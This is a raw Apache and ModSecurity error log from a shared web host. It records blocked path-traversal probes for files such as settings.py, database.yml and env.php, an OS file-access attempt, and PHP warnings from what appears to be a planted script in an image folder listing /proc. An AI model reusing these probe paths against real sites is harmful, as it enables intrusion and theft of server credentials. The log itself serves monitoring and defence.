[Tue May 12 04:40:44.849308 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTLM1tk6y7yBJLpJoqQgAAAJQ"]
[Tue May 12 04:40:45.289555 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTLM1tk6y7yBJLpJoqQgAAAJQ"]
[Tue May 12 04:40:45.801135 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTLc1tk6y7yBJLpJoqQwAAAJQ"]
[Tue May 12 04:40:45.801344 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTLc1tk6y7yBJLpJoqQwAAAJQ"]
[Tue May 12 04:40:46.223178 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTLc1tk6y7yBJLpJoqQwAAAJQ"]
[Tue May 12 04:40:46.734732 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTLs1tk6y7yBJLpJoqRQAAAJQ"]
[Tue May 12 04:40:46.734900 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTLs1tk6y7yBJLpJoqRQAAAJQ"]
[Tue May 12 04:40:47.165728 2026] [security2:error] [pid 1820198:tid 1820220] [client 45.148.10.166:38004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTLs1tk6y7yBJLpJoqRQAAAJQ"]
[Tue May 12 04:40:55.031930 2026] [security2:error] [pid 1808852:tid 1808860] [client 43.135.148.92:40710] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.totalcloud.fr"] [uri "/"] [unique_id "agKTNxfeipD4uoG21FojBQAAAAU"]
[Tue May 12 04:40:55.033426 2026] [autoindex:error] [pid 1808852:tid 1808860] [client 43.135.148.92:40710] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 04:41:42.132293 2026] [security2:error] [pid 1825179:tid 1825212] [client 43.156.117.41:50444] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKTZtr1yOh9TvizeziQeAAAAE4"]
[Tue May 12 04:42:15.933220 2026] [authz_core:error] [pid 1730175:tid 1730177] [client 176.120.22.46:55692] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/customize/error_log, referer: https://www.maelbailly.fr/wp-includes/customize/
[Tue May 12 04:42:28.705298 2026] [authz_core:error] [pid 1730175:tid 1730197] [client 176.120.22.46:65248] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/html-api/error_log, referer: https://www.maelbailly.fr/wp-includes/html-api/
[Tue May 12 04:42:43.997080 2026] [security2:error] [pid 1730175:tid 1730194] [client 216.73.216.110:23575] ModSecurity: Warning. Matched phrase "var/log/xferlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/xferlog found within ARGS:filesrc: /var/log/xferlog.offsetftpsep"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKTo3o6NvB9WXx5V-6fwAAAARE"]
[Tue May 12 04:42:43.997704 2026] [security2:error] [pid 1730175:tid 1730194] [client 216.73.216.110:23575] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKTo3o6NvB9WXx5V-6fwAAAARE"]
[Tue May 12 04:42:44.084717 2026] [security2:error] [pid 1730175:tid 1730194] [client 216.73.216.110:23575] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKTo3o6NvB9WXx5V-6fwAAAARE"]
[Tue May 12 04:42:46.231466 2026] [security2:error] [pid 1825179:tid 1825216] [client 139.155.134.17:58358] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agKTptr1yOh9TvizeziQpwAAAFI"]
PHP Warning:  filesize(): stat failed for /proc/72/task/72/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/72/task/72/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/72/task/72/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/72/task/72/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/72/task/72/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/72/task/72/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:43:00.948578 2026] [authz_core:error] [pid 1730175:tid 1730199] [client 176.120.22.46:52539] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/interactivity-api/error_log, referer: https://www.maelbailly.fr/wp-includes/interactivity-api/
[Tue May 12 04:43:04.410926 2026] [autoindex:error] [pid 1825287:tid 1825318] [client 147.182.145.109:42496] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 04:43:06.926393 2026] [:error] [pid 1808852:tid 1808870] [client 147.182.145.109:42602] File does not exist: /home/totalcloud/public_html/index.php, referer: https://ns1.webshop.totalcloud.fr/
[Tue May 12 04:43:14.681858 2026] [ssl:error] [pid 1820198:tid 1820220] (EAI 2)Name or service not known: [client 54.226.210.74:41222] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:43:14.681911 2026] [ssl:error] [pid 1820198:tid 1820220] AH01941: stapling_renew_response: responder error
[Tue May 12 04:43:15.050718 2026] [ssl:error] [pid 1825287:tid 1825308] (EAI 2)Name or service not known: [client 54.226.210.74:41234] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:43:15.050757 2026] [ssl:error] [pid 1825287:tid 1825308] AH01941: stapling_renew_response: responder error
PHP Warning:  filesize(): stat failed for /proc/914/task/914/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/914/task/914/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/914/task/914/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/914/task/914/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:43:20.386296 2026] [security2:error] [pid 1825179:tid 1825211] [client 43.165.167.72:43046] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agKTyNr1yOh9TvizeziQvgAAAE0"], referer: http://www.missmandarine.com
[Tue May 12 04:43:54.646141 2026] [security2:error] [pid 1730207:tid 1730220] [client 43.166.246.180:45372] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/secret/"] [unique_id "agKT6jue9Sp-pIv_Bb62bAAAAUs"]
[Tue May 12 04:44:30.248480 2026] [security2:error] [pid 1808852:tid 1808878] [client 150.109.46.88:34176] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKUDhfeipD4uoG21FojkAAAABc"]
[Tue May 12 04:44:33.597503 2026] [security2:error] [pid 1730207:tid 1730230] [client 150.109.46.88:34712] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/"] [unique_id "agKUETue9Sp-pIv_Bb62hgAAAVU"], referer: http://tct-telecom.fr
[Tue May 12 04:44:40.348706 2026] [core:error] [pid 1808852:tid 1808857] [client 172.190.142.176:9054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:40.348741 2026] [core:error] [pid 1808852:tid 1808857] [client 172.190.142.176:9054] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:40.941935 2026] [core:error] [pid 1730175:tid 1730197] [client 172.190.142.176:32345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:40.941969 2026] [core:error] [pid 1730175:tid 1730197] [client 172.190.142.176:32345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:41.416813 2026] [core:error] [pid 1730207:tid 1730226] [client 172.190.142.176:19934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:41.416853 2026] [core:error] [pid 1730207:tid 1730226] [client 172.190.142.176:19934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.032250 2026] [core:error] [pid 1808852:tid 1808868] [client 172.190.142.176:55762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.032279 2026] [core:error] [pid 1808852:tid 1808868] [client 172.190.142.176:55762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.419211 2026] [core:error] [pid 1825287:tid 1825311] [client 172.190.142.176:19955] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.419244 2026] [core:error] [pid 1825287:tid 1825311] [client 172.190.142.176:19955] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.937851 2026] [core:error] [pid 1730207:tid 1730231] [client 172.190.142.176:32368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:42.937882 2026] [core:error] [pid 1730207:tid 1730231] [client 172.190.142.176:32368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:43.416187 2026] [core:error] [pid 1730207:tid 1730222] [client 172.190.142.176:32338] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:43.416211 2026] [core:error] [pid 1730207:tid 1730222] [client 172.190.142.176:32338] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:43.797576 2026] [core:error] [pid 1730175:tid 1730193] [client 172.190.142.176:60757] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:43.797614 2026] [core:error] [pid 1730175:tid 1730193] [client 172.190.142.176:60757] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:44.221712 2026] [core:error] [pid 1730207:tid 1730217] [client 172.190.142.176:9049] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:44.221748 2026] [core:error] [pid 1730207:tid 1730217] [client 172.190.142.176:9049] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:44.661561 2026] [core:error] [pid 1825179:tid 1825206] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:44.661600 2026] [core:error] [pid 1825179:tid 1825206] [client 172.190.142.176:9087] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.140393 2026] [core:error] [pid 1825287:tid 1825324] [client 172.190.142.176:9027] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.140425 2026] [core:error] [pid 1825287:tid 1825324] [client 172.190.142.176:9027] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.556612 2026] [core:error] [pid 1825179:tid 1825217] [client 172.190.142.176:14314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.556655 2026] [core:error] [pid 1825179:tid 1825217] [client 172.190.142.176:14314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.996753 2026] [core:error] [pid 1820198:tid 1820201] [client 172.190.142.176:9050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:45.996785 2026] [core:error] [pid 1820198:tid 1820201] [client 172.190.142.176:9050] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:46.353427 2026] [core:error] [pid 1808852:tid 1808870] [client 172.190.142.176:14332] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:46.353462 2026] [core:error] [pid 1808852:tid 1808870] [client 172.190.142.176:14332] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:46.763735 2026] [core:error] [pid 1825287:tid 1825312] [client 172.190.142.176:9057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:46.763771 2026] [core:error] [pid 1825287:tid 1825312] [client 172.190.142.176:9057] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:47.182440 2026] [core:error] [pid 1825179:tid 1825210] [client 172.190.142.176:14333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:47.182475 2026] [core:error] [pid 1825179:tid 1825210] [client 172.190.142.176:14333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:47.582360 2026] [core:error] [pid 1825287:tid 1825330] [client 172.190.142.176:60754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:47.582397 2026] [core:error] [pid 1825287:tid 1825330] [client 172.190.142.176:60754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.011355 2026] [core:error] [pid 1730207:tid 1730212] [client 172.190.142.176:9083] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.011392 2026] [core:error] [pid 1730207:tid 1730212] [client 172.190.142.176:9083] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.417411 2026] [core:error] [pid 1825179:tid 1825215] [client 172.190.142.176:32364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.417446 2026] [core:error] [pid 1825179:tid 1825215] [client 172.190.142.176:32364] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.837786 2026] [core:error] [pid 1808852:tid 1808864] [client 172.190.142.176:9076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:48.837821 2026] [core:error] [pid 1808852:tid 1808864] [client 172.190.142.176:9076] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:44:49.243416 2026] [core:error] [pid 1730175:tid 1730198] [client 172.190.142.176:15492] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
